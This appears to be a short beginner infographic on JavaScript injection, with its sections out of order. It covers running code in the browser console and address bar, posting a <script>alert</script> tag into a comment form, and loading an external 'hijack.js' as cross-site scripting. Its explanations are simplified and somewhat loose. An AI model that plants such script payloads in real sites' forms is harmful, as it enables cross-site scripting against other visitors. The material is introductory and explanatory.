JS

3 QUICK EXAMPLES OF JAVASCRIPT INJECTION

Simply put, users finding ways to insert or override the "original"Javascript with their own. Therefore, known as "Javascript Injection".

WHAT IS JS INJECTION?

01

Most people will point to "do bad things" and "hacking". But no. Developers also sometimes do injection to test things out quickly.

WHY DO JS INJECTION?

02

Press F12 in most modern browsers to open up developer's console.

Open any webpage.

DEVELOPER'S CONSOLE INJECT (A)

03

Enter your script in the console tab. For example, function foo () { alert(”bar”); }

Double click on the HTML, insert your own onclick=”foo()”.

Right-click on an element > Inspect.

DEVELOPER'S CONSOLE INJECT (B)

04

Done. Click on the element.

Simply enter "javascript:YOUR-CODE-HERE" into the address bar.

ADDRESS BAR INJECT

05

 For example, javascript:alert("hi!");

Just enter a <script> tag into a comment or review form. For example - Hi! <script>alert("Foo");</script>

Most modern websites have proper anti-injection measures (99% will not work).

CROSS-SITE SCRIPTING

06

Cross-site scripting- When you load the JS from another site <script src="http://site.com/hijack.js"></script>